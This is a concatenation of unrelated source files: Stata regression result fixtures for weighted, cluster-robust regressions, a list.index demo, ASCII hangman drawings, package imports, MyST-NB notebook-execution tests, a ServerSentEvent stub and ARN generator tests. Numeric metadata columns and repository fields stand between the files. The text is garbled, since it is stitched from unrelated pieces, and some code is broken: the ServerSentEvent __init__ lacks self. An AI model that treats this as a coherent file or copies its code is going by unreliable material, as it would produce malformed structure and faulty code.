# Bundle for the WLS / aweight / cluster-vce variant.
results_wls_aweight_clu1 = Bunch(
    params_table=params_table,
    params_table_colnames=params_table_colnames,
    params_table_rownames=params_table_rownames,
    cov=cov,
    cov_colnames=cov_colnames,
    cov_rownames=cov_rownames,
    infocrit=infocrit,
    infocrit_colnames=infocrit_colnames,
    infocrit_rownames=infocrit_rownames,
    predicted=predicted,
    predicted_colnames=predicted_colnames,
    predicted_rownames=predicted_rownames,
    **est
)
# Scalar results for `regress` with fweight and vce(cluster id);
# frequency weights expand the effective sample to N = 33.
est = dict(
    rank = 7,
    ll_0 = -107.2219871314995,
    ll = -92.28589853187629,
    r2_a = .5022105716958969,
    rss = 518.9021109886529,
    mss = 764.067585981045,
    rmse = 4.467412394167744,
    r2 = .5955460895029162,
    F = 1.835843414931295,
    df_r = 8,
    df_m = 6,
    N = 33,
    N_clust = 9,
    cmdline = "regress executions income perpoverty perblack LN_VC100k96 south degree [fweight=fweight], vce(cluster id)",
    title = "Linear regression",
    marginsok = "XB default",
    vce = "cluster",
    depvar = "executions",
    cmd = "regress",
    properties = "b V",
    predict = "regres_p",
    model = "ols",
    estat_cmd = "regress_estat",
    wexp = "= fweight",
    wtype = "fweight",
    vcetype = "Robust",
    clustvar = "id",
)
# Coefficient table, 7 rows x 9 cols; df column is 8 throughout.
params_table = np.array([
    .00177624355887, .00090840849363, 1.9553357012053, .08627786102497,
    -.00031855018389, .00387103730162, 8, 2.3060041352042,
    0, .70240571372091, .56538554103558, 1.2423482079757,
    .24928937729829, -.60137568189177, 2.0061871093336, 8,
    2.3060041352042, 0, -.76566360596606, .44599112337258,
    -1.7167687109468, .12435346910262, -1.7941209807276, .26279376879547,
    8, 2.3060041352042, 0, 5.7915855647065,
    5.5209346785031, 1.0490226568442, .32482245151877, -6.9397126341137,
    18.522883763527, 8, 2.3060041352042, 0,
    13.018291494864, 6.9749133861223, 1.866444896759, .09894610636006,
    -3.0658876162246, 29.102470605953, 8, 2.3060041352042,
    0, -140.99921608421, 74.459752971542, -1.8936299202886,
    .09489418422765, -312.70371434287, 30.705282174445, 8,
    2.3060041352042, 0, -68.484290889814, 44.031279012175,
    -1.5553554751584, .15847103736706, -170.02060237022, 33.05202059059,
    8, 2.3060041352042, 0]).reshape(7,9)
params_table_colnames = 'b se t pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 cluster-robust covariance matrix of the parameter estimates.
cov = np.array([
    8.252059913e-07, .00032745422504, -.00034055649365, .00297535656989,
    .0050273735686, -.06443757015017, -.03471834212801, .00032745422504,
    .31966081001209, -.05946652511329, -.26221023642171, .63562646882257,
    -24.437547435849, -7.9418573267692, -.00034055649365, -.05946652511329,
    .19890808212714, -2.2098158572872, -3.037041780658, 27.566734608754,
    18.96427104159, .00297535656989, -.26221023642171, -2.2098158572872,
    30.480719724298, 32.578028781062, -258.44775668729, -217.82099053713,
    .0050273735686, .63562646882257, -3.037041780658, 32.578028781062,
    48.649416743908, -386.32096934921, -281.91905783396, -.06443757015017,
    -24.437547435849, 27.566734608754, -258.44775668729, -386.32096934921,
    5544.254812583, 2717.0292082435, -.03471834212801, -7.9418573267692,
    18.96427104159, -217.82099053713, -281.91905783396, 2717.0292082435,
    1938.753531448]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information criteria: N, ll0, ll, df, AIC, BIC.
infocrit = np.array([
    33, -107.2219871315, -92.285898531876, 7,
    198.57179706375, 209.04734999402])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation prediction and its std. error (17 x 2).
predicted = np.array([
    23.018356323242, 10.285571098328, 7.6487560272217, 3.0379540920258,
    1.3298480510712, 1.8589791059494, 6.7120413780212, 2.4757008552551,
    .90416890382767, 1.9327516555786, 1.9608836174011, 1.8162038326263,
    4.6054129600525, 2.5453994274139, 2.9902882575989, 1.485733628273,
    1.4887162446976, 1.6206097602844, 5.9044842720032, 4.2758340835571,
    7.0818486213684, 3.8910882472992, 7.5460968017578, 4.9860787391663,
    4.1125593185425, 2.4037673473358, -2.7979807853699, 3.4744529724121,
    -1.4647831916809, 2.1380014419556, -3.5234127044678, 3.1161375045776,
    3.9779393672943, 1.4975799322128]).reshape(17,2)
predicted_colnames = 'predict_mu predict_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle for the WLS / fweight / cluster-vce variant.
results_wls_fweight_clu1 = Bunch(
    params_table=params_table,
    params_table_colnames=params_table_colnames,
    params_table_rownames=params_table_rownames,
    cov=cov,
    cov_colnames=cov_colnames,
    cov_rownames=cov_rownames,
    infocrit=infocrit,
    infocrit_colnames=infocrit_colnames,
    infocrit_rownames=infocrit_rownames,
    predicted=predicted,
    predicted_colnames=predicted_colnames,
    predicted_rownames=predicted_rownames,
    **est
)
# Scalar results for `regress` with pweight and vce(cluster id).
# Numerically identical to the aweight/cluster run except wtype/cmdline.
est = dict(
    rank = 7,
    ll_0 = -55.23556912834824,
    ll = -47.54122045581504,
    r2_a = .3528737432046668,
    rss = 267.3132086911238,
    mss = 393.6105745962962,
    rmse = 5.17023412130557,
    r2 = .5955460895029168,
    F = 1.412187242235973,
    df_r = 8,
    df_m = 6,
    N = 17,
    N_clust = 9,
    cmdline = "regress executions income perpoverty perblack LN_VC100k96 south degree [pweight=fweight], vce(cluster id)",
    title = "Linear regression",
    marginsok = "XB default",
    vce = "cluster",
    depvar = "executions",
    cmd = "regress",
    properties = "b V",
    predict = "regres_p",
    model = "ols",
    estat_cmd = "regress_estat",
    wexp = "= fweight",
    wtype = "pweight",
    vcetype = "Robust",
    clustvar = "id",
)
# Coefficient table, 7 rows x 9 cols; df column is 8 throughout.
params_table = np.array([
    .00177624355887, .00103574504038, 1.7149428571794, .12469817836724,
    -.00061218878728, .00416467590501, 8, 2.3060041352042,
    0, .70240571372092, .64463869959516, 1.0896114585768,
    .30761438040884, -.78413379325815, 2.1889452207, 8,
    2.3060041352042, 0, -.76566360596606, .50850811868177,
    -1.5057057652313, .17056206446331, -1.9382854304311, .40695821849901,
    8, 2.3060041352042, 0, 5.7915855647065,
    6.2948340440059, .92005373362009, .3844480847801, -8.7243277711951,
    20.307498900608, 8, 2.3060041352042, 0,
    13.018291494864, 7.9526248350517, 1.6369804642972, .14027059672576,
    -5.3204942604922, 31.357077250221, 8, 2.3060041352042,
    0, -140.99921608421, 84.897180497105, -1.6608233071889,
    .13532738016362, -336.77246537771, 54.774033209288, 8,
    2.3060041352042, 0, -68.484290889814, 50.203382265366,
    -1.3641369923608, .2096627597382, -184.25349799498, 47.284916215355,
    8, 2.3060041352042, 0]).reshape(7,9)
params_table_colnames = 'b se t pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 cluster-robust covariance matrix of the parameter estimates.
cov = np.array([
    1.072767789e-06, .00042569049255, -.00044272344175, .00386796354086,
    .00653558563917, -.08376884119522, -.04513384476642, .00042569049255,
    .41555905301573, -.07730648264729, -.34087330734824, .82631440946934,
    -31.768811666606, -10.324414524804, -.00044272344175, -.07730648264729,
    .25858050676528, -2.8727606144729, -3.9481543148554, 35.836754991381,
    24.653552354067, .00386796354086, -.34087330734824, -2.8727606144729,
    39.624935641576, 42.351437415382, -335.98208369348, -283.16728769825,
    .00653558563917, .82631440946934, -3.9481543148554, 42.351437415382,
    63.24424176708, -502.21726015398, -366.49477518415, -.08376884119522,
    -31.768811666606, 35.836754991381, -335.98208369348, -502.21726015398,
    7207.531256358, 3532.1379707168, -.04513384476642, -10.324414524804,
    24.653552354067, -283.16728769825, -366.49477518415, 3532.1379707168,
    2520.3795908825]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information criteria: N, ll0, ll, df, AIC, BIC.
infocrit = np.array([
    17, -55.235569128348, -47.541220455815, 7,
    109.08244091163, 114.91493432002])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation prediction and its std. error (17 x 2).
predicted = np.array([
    23.018356323242, 11.727355003357, 7.6487560272217, 3.4638004302979,
    1.3298480510712, 2.1195623874664, 6.7120413780212, 2.8227334022522,
    .90416890382767, 2.2036759853363, 1.9608836174011, 2.0707910060883,
    4.6054129600525, 2.9022018909454, 2.9902882575989, 1.6939970254898,
    1.4887162446976, 1.8477793931961, 5.9044842720032, 4.8752007484436,
    7.0818486213684, 4.4365234375, 7.5460968017578, 5.6850047111511,
    4.1125593185425, 2.7407164573669, -2.7979807853699, 3.9614858627319,
    -1.4647831916809, 2.4376966953278, -3.5234127044678, 3.5529434680939,
    3.9779393672943, 1.7075037956238]).reshape(17,2)
predicted_colnames = 'predict_mu predict_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle for the WLS / pweight / cluster-vce variant.
results_wls_pweight_clu1 = Bunch(
    params_table=params_table,
    params_table_colnames=params_table_colnames,
    params_table_rownames=params_table_rownames,
    cov=cov,
    cov_colnames=cov_colnames,
    cov_rownames=cov_rownames,
    infocrit=infocrit,
    infocrit_colnames=infocrit_colnames,
    infocrit_rownames=infocrit_rownames,
    predicted=predicted,
    predicted_colnames=predicted_colnames,
    predicted_rownames=predicted_rownames,
    **est
)
| 45.162473
| 147
| 0.620626
| 9,744
| 105,906
| 6.638034
| 0.166564
| 0.024659
| 0.007792
| 0.024675
| 0.720613
| 0.717027
| 0.701582
| 0.688347
| 0.679891
| 0.67904
| 0
| 0.527313
| 0.271259
| 105,906
| 2,344
| 148
| 45.181741
| 0.310762
| 0
| 0
| 0.774641
| 0
| 0.002871
| 0.105565
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000478
| false
| 0
| 0.000478
| 0
| 0.001435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
67cdd0bd1a3c2b29d3a2ac42180569e987be415d
| 38
|
py
|
Python
|
31/00/list.index.1.py
|
pylangstudy/201705
|
c69de524faa67fa2d96267d5a51ed9794208f0e4
|
[
"CC0-1.0"
] | null | null | null |
31/00/list.index.1.py
|
pylangstudy/201705
|
c69de524faa67fa2d96267d5a51ed9794208f0e4
|
[
"CC0-1.0"
] | 38
|
2017-05-25T07:08:48.000Z
|
2017-05-31T01:42:41.000Z
|
31/00/list.index.1.py
|
pylangstudy/201705
|
c69de524faa67fa2d96267d5a51ed9794208f0e4
|
[
"CC0-1.0"
] | null | null | null |
# Demonstrate list.index: it raises ValueError when the value is absent,
# so guard the lookup (EAFP) instead of letting the script crash.
numbers = [10, 20, 30, 40]
try:
    print(numbers.index(999))
except ValueError:
    # 999 is not in the list; report instead of crashing.
    print("999 is not in the list")
| 12.666667
| 19
| 0.605263
| 9
| 38
| 2.555556
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.323529
| 0.105263
| 38
| 2
| 20
| 19
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
db2eefa4d0df81b44bc89c3270efd161c3ae8573
| 705
|
py
|
Python
|
unit 1/exc. 1.4.2.py
|
AviKalPython/self.py
|
44f8de33797a9ea28bbd1e01006920ba7c818b97
|
[
"MIT"
] | null | null | null |
unit 1/exc. 1.4.2.py
|
AviKalPython/self.py
|
44f8de33797a9ea28bbd1e01006920ba7c818b97
|
[
"MIT"
] | null | null | null |
unit 1/exc. 1.4.2.py
|
AviKalPython/self.py
|
44f8de33797a9ea28bbd1e01006920ba7c818b97
|
[
"MIT"
] | null | null | null |
# exc - 1.4.2 (rolling mission)
# The seven hangman stages, captioned and printed in order.
_PICTURES = (
    """picture 1:
x-------x""",
    """picture 2:
x-------x
|
|
|
|
|""",
    """picture 3:
x-------x
| |
| 0
|
|
|""",
    """picture 4:
x-------x
| |
| 0
| |
|
|""",
    """picture 5:
x-------x
| |
| 0
| /|\\
|
|""",
    """picture 6:
x-------x
| |
| 0
| /|\\
| /
|""",
    """picture 7:
x-------x
| |
| 0
| /|\\
| / \\
|""",
)
for _picture in _PICTURES:
    print(_picture)
| 13.823529
| 32
| 0.184397
| 46
| 705
| 2.826087
| 0.304348
| 0.646154
| 0.115385
| 0.246154
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 0.574468
| 705
| 51
| 33
| 13.823529
| 0.383333
| 0.041135
| 0
| 0.590909
| 0
| 0
| 0.832
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.159091
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
db310a5bf54963035922f9611f57e44e6f7b99a7
| 26
|
py
|
Python
|
sns/api/reddit/__init__.py
|
kylepw/panner
|
482ef8e8c1e8d9464d7dc8e4df5b5d9b58e83d35
|
[
"MIT"
] | 2
|
2019-07-20T01:48:20.000Z
|
2019-11-15T06:50:54.000Z
|
sns/api/reddit/__init__.py
|
kylepw/panner
|
482ef8e8c1e8d9464d7dc8e4df5b5d9b58e83d35
|
[
"MIT"
] | 5
|
2020-02-12T08:58:06.000Z
|
2021-09-22T17:56:42.000Z
|
sns/api/reddit/__init__.py
|
kylepw/panner
|
482ef8e8c1e8d9464d7dc8e4df5b5d9b58e83d35
|
[
"MIT"
] | null | null | null |
from .reddit import Reddit
| 26
| 26
| 0.846154
| 4
| 26
| 5.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 1
| 26
| 26
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
db3316baf71d34a1cb773146b81d366869ab014f
| 90
|
py
|
Python
|
backend/src/awattprice_notifications/__init__.py
|
sp4c38/AwattarApp
|
b914e8042e5cdcb84485d6d45133a00244662bda
|
[
"BSD-3-Clause"
] | 2
|
2020-09-06T18:17:20.000Z
|
2020-09-06T19:06:19.000Z
|
backend/src/awattprice_notifications/__init__.py
|
sp4c38/AwattarApp
|
b914e8042e5cdcb84485d6d45133a00244662bda
|
[
"BSD-3-Clause"
] | null | null | null |
backend/src/awattprice_notifications/__init__.py
|
sp4c38/AwattarApp
|
b914e8042e5cdcb84485d6d45133a00244662bda
|
[
"BSD-3-Clause"
] | null | null | null |
from . import apns
from . import defaults
from . import notifications
from . import utils
| 18
| 27
| 0.777778
| 12
| 90
| 5.833333
| 0.5
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 90
| 4
| 28
| 22.5
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e1db307b91a109a22cd725f8ec733b37f921e6f6
| 7,074
|
py
|
Python
|
tests/test_execute.py
|
tonyfast/MyST-NB
|
5ba41a2f29982db076d9e87fe41391f36057f2f8
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_execute.py
|
tonyfast/MyST-NB
|
5ba41a2f29982db076d9e87fe41391f36057f2f8
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_execute.py
|
tonyfast/MyST-NB
|
5ba41a2f29982db076d9e87fe41391f36057f2f8
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
# Build an unexecuted notebook with the "cache" execution mode and check
# that outputs get populated and regression files match.
@pytest.mark.sphinx_params(
    "basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "cache"}
)
def test_basic_unrun(sphinx_run, file_regression, check_nbs):
    """The outputs should be populated."""
    sphinx_run.build()
    # A clean build: no warnings expected.
    assert sphinx_run.warnings() == ""
    # Notebook-level metadata (test_name) must survive into the sphinx env.
    assert "test_name" in sphinx_run.app.env.metadata["basic_unrun"]
    # Compare executed notebook and rendered doctree against stored baselines.
    file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
    file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
@pytest.mark.sphinx_params(
    "basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "cache"}
)
def test_rebuild_cache(sphinx_run):
    """The notebook should only be executed once."""
    sphinx_run.build()
    assert "Executing" in sphinx_run.status(), sphinx_run.status()
    # After invalidation the second build must be served from the jupyter-cache,
    # so no "Executing" message should appear.
    sphinx_run.invalidate_files()
    sphinx_run.build()
    assert "Executing" not in sphinx_run.status(), sphinx_run.status()
@pytest.mark.sphinx_params(
    "basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "force"}
)
def test_rebuild_force(sphinx_run):
    """The notebook should be executed twice."""
    sphinx_run.build()
    assert "Executing" in sphinx_run.status(), sphinx_run.status()
    # "force" mode re-executes even when the source has not changed.
    sphinx_run.invalidate_files()
    sphinx_run.build()
    assert "Executing" in sphinx_run.status(), sphinx_run.status()
@pytest.mark.sphinx_params(
    "basic_unrun.ipynb",
    conf={
        "jupyter_execute_notebooks": "cache",
        "execution_excludepatterns": ["basic_*"],
    },
)
def test_exclude_path(sphinx_run, file_regression):
    """The notebook should not be executed."""
    sphinx_run.build()
    # The glob in execution_excludepatterns should match exactly one notebook.
    assert len(sphinx_run.app.env.excluded_nb_exec_paths) == 1
    assert "Executing" not in sphinx_run.status(), sphinx_run.status()
    file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
@pytest.mark.sphinx_params(
    "basic_failing.ipynb", conf={"jupyter_execute_notebooks": "cache"}
)
def test_basic_failing(sphinx_run, file_regression, check_nbs):
    """A failing notebook surfaces warnings and still produces a report file."""
    sphinx_run.build()
    # print(sphinx_run.status())
    assert "Execution Failed" in sphinx_run.warnings()
    assert (
        "Couldn't find cache key for notebook file source/basic_failing.ipynb"
        in sphinx_run.warnings()
    )
    file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
    file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
    # Must not raise: a failure report should have been written.
    sphinx_run.get_report_file()
@pytest.mark.sphinx_params(
    "basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "auto"}
)
def test_basic_unrun_nbclient(sphinx_run, file_regression, check_nbs):
    """Like test_basic_unrun, but under "auto" execution mode."""
    sphinx_run.build()
    # print(sphinx_run.status())
    assert sphinx_run.warnings() == ""
    assert "test_name" in sphinx_run.app.env.metadata["basic_unrun"]
    file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
    file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
@pytest.mark.sphinx_params(
    "basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "force"}
)
def test_outputs_present(sphinx_run, file_regression, check_nbs):
    """Under "force" execution, outputs are populated with no warnings."""
    sphinx_run.build()
    # print(sphinx_run.status())
    assert sphinx_run.warnings() == ""
    assert "test_name" in sphinx_run.app.env.metadata["basic_unrun"]
    file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
    file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
@pytest.mark.sphinx_params(
    "complex_outputs_unrun.ipynb", conf={"jupyter_execute_notebooks": "cache"}
)
def test_complex_outputs_unrun(sphinx_run, file_regression, check_nbs):
    """A complex notebook executes cleanly and widget JSON reaches the HTML."""
    sphinx_run.build()
    # print(sphinx_run.status())
    assert sphinx_run.warnings() == ""
    file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
    file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
    # Widget view and widget state should make it into the HTML
    html = sphinx_run.get_html()
    assert '<script type="application/vnd.jupyter.widget-view+json">' in html
    assert '<script type="application/vnd.jupyter.widget-state+json">' in html
@pytest.mark.sphinx_params(
    "complex_outputs_unrun.ipynb", conf={"jupyter_execute_notebooks": "auto"}
)
def test_complex_outputs_unrun_nbclient(sphinx_run, file_regression, check_nbs):
    """Like test_complex_outputs_unrun, but under "auto" execution mode."""
    sphinx_run.build()
    # print(sphinx_run.status())
    assert sphinx_run.warnings() == ""
    file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
    file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
    # Widget view and widget state should make it into the HTML
    html = sphinx_run.get_html()
    assert '<script type="application/vnd.jupyter.widget-view+json">' in html
    assert '<script type="application/vnd.jupyter.widget-state+json">' in html
@pytest.mark.sphinx_params(
    "basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "off"}
)
def test_no_execute(sphinx_run, file_regression, check_nbs):
    """With execution "off", the build succeeds using the notebook as-is."""
    sphinx_run.build()
    # print(sphinx_run.status())
    assert sphinx_run.warnings() == ""
    file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
    file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
@pytest.mark.sphinx_params(
    "basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "cache"}
)
def test_jupyter_cache_path(sphinx_run, file_regression, check_nbs):
    """A cached run reports "Execution Succeeded" with no warnings."""
    sphinx_run.build()
    assert "Execution Succeeded" in sphinx_run.status()
    assert sphinx_run.warnings() == ""
    file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
    file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
# Testing relative paths within the notebook
@pytest.mark.sphinx_params(
    "basic_relative.ipynb", conf={"jupyter_execute_notebooks": "cache"}
)
def test_relative_path_cache(sphinx_run, file_regression, check_nbs):
    """A notebook using relative paths executes under the cache executor."""
    sphinx_run.build()
    assert "Executing" in sphinx_run.status(), sphinx_run.status()
@pytest.mark.sphinx_params(
    "basic_relative.ipynb", conf={"jupyter_execute_notebooks": "force"}
)
def test_relative_path_force(sphinx_run, file_regression, check_nbs):
    """A notebook using relative paths executes under "force" mode."""
    sphinx_run.build()
    assert "Executing" in sphinx_run.status(), sphinx_run.status()
# Execution timeout configuration
@pytest.mark.sphinx_params(
    "complex_outputs_unrun.ipynb",
    conf={"jupyter_execute_notebooks": "cache", "execution_timeout": 1},
)
def test_execution_timeout(sphinx_run, file_regression, check_nbs):
    """Execution should fail given the low (1 second) timeout value."""
    sphinx_run.build()
    assert "execution failed" in sphinx_run.warnings()
@pytest.mark.sphinx_params(
    "complex_outputs_unrun_timeout.ipynb",
    conf={"jupyter_execute_notebooks": "cache", "execution_timeout": 60},
)
def test_execution_metadata_timeout(sphinx_run, file_regression, check_nbs):
    """Notebook timeout metadata takes precedence over the execution_timeout config."""
    sphinx_run.build()
    assert "execution failed" in sphinx_run.warnings()
| 38.237838
| 88
| 0.739327
| 935
| 7,074
| 5.284492
| 0.113369
| 0.163934
| 0.111516
| 0.086015
| 0.867638
| 0.843352
| 0.843352
| 0.804493
| 0.783849
| 0.767051
| 0
| 0.000647
| 0.126661
| 7,074
| 184
| 89
| 38.445652
| 0.799126
| 0.089483
| 0
| 0.595588
| 0
| 0
| 0.217378
| 0.115018
| 0
| 0
| 0
| 0
| 0.198529
| 1
| 0.110294
| false
| 0
| 0.007353
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c027d718d2391c4d5604b5403c5798b0572b39f8
| 64
|
py
|
Python
|
stream/server_sent_event.py
|
project-nait/simple-stream
|
0fb4a031442b30cd8d0e10ebf78756cdd06f535b
|
[
"MIT"
] | null | null | null |
stream/server_sent_event.py
|
project-nait/simple-stream
|
0fb4a031442b30cd8d0e10ebf78756cdd06f535b
|
[
"MIT"
] | null | null | null |
stream/server_sent_event.py
|
project-nait/simple-stream
|
0fb4a031442b30cd8d0e10ebf78756cdd06f535b
|
[
"MIT"
] | null | null | null |
class ServerSentEvent(object):
    """Placeholder for a server-sent event (SSE) payload.

    No state is held yet; the class exists so callers can instantiate it.
    """

    def __init__(self):
        # Bug fix: the original signature was `def __init__():` (missing
        # `self`), so ServerSentEvent() raised TypeError on every call.
        pass
| 16
| 30
| 0.640625
| 6
| 64
| 6.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.265625
| 64
| 3
| 31
| 21.333333
| 0.787234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
c0383fb798279946dc5e1f0aa34294a736c41bee
| 25,505
|
py
|
Python
|
cfn_policy_validator/tests/parsers_tests/utils_tests/test_arn_generator.py
|
awslabs/aws-cloudformation-iam-policy-validator
|
52c1439e4d76d2c7d45c97563cc87f8458134e0b
|
[
"MIT-0"
] | 41
|
2021-09-30T01:28:51.000Z
|
2022-03-24T09:42:09.000Z
|
cfn_policy_validator/tests/parsers_tests/utils_tests/test_arn_generator.py
|
awslabs/aws-cloudformation-iam-policy-validator
|
52c1439e4d76d2c7d45c97563cc87f8458134e0b
|
[
"MIT-0"
] | 10
|
2021-09-30T08:13:11.000Z
|
2022-03-22T07:34:41.000Z
|
cfn_policy_validator/tests/parsers_tests/utils_tests/test_arn_generator.py
|
awslabs/aws-cloudformation-iam-policy-validator
|
52c1439e4d76d2c7d45c97563cc87f8458134e0b
|
[
"MIT-0"
] | 3
|
2021-11-29T21:13:30.000Z
|
2022-02-04T12:49:40.000Z
|
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
"""
import unittest
from cfn_policy_validator.application_error import ApplicationError
from cfn_policy_validator.parsers.utils.arn_generator import ArnGenerator
from cfn_policy_validator.tests.parsers_tests import mock_node_evaluator_setup
from cfn_policy_validator.tests.utils import account_config, load, load_resources, required_property_error, \
expected_type_error
def build_resource(resource):
	"""Wrap *resource* in a minimal template under the fixed logical id 'ResourceA' and return the parsed node."""
	template = load({
		'Resources': {
			'ResourceA': resource
		}
	})
	return template['Resources']['ResourceA']
class WhenGeneratingAnArnForAKnownResource(unittest.TestCase):
	"""ARNs are generated for resource types the generator knows, via Ref or attribute."""
	def setUp(self):
		self.arn_generator = ArnGenerator(account_config)
	@mock_node_evaluator_setup()
	def test_generates_arn_from_ref(self):
		resource = build_resource({'Type': 'AWS::AccessAnalyzer::Analyzer'})
		arn = self.arn_generator.try_generate_arn("MyAnalyzer", resource, "Ref")
		self.assertEqual(f"arn:aws:access-analyzer:{account_config.region}:{account_config.account_id}:analyzer/MyAnalyzer", arn)
	@mock_node_evaluator_setup()
	def test_generates_arn_from_attribute(self):
		resource = build_resource({'Type': "AWS::ECS::Cluster"})
		arn = self.arn_generator.try_generate_arn("MyTestCluster", resource, "Arn")
		self.assertEqual(f"arn:aws:ecs:{account_config.region}:{account_config.account_id}:cluster/MyTestCluster", arn)
class WhenGeneratingAnArnForAnUnknownResource(unittest.TestCase):
	"""Unknown (well-formed) resource types yield None rather than an error."""
	def setUp(self):
		self.arn_generator = ArnGenerator(account_config)
	@mock_node_evaluator_setup()
	def test_does_not_generate_arn(self):
		resource = build_resource({'Type': "AWS::EC2::Instance"})
		arn = self.arn_generator.try_generate_arn("AnyName", resource, "Ref")
		self.assertIsNone(arn)
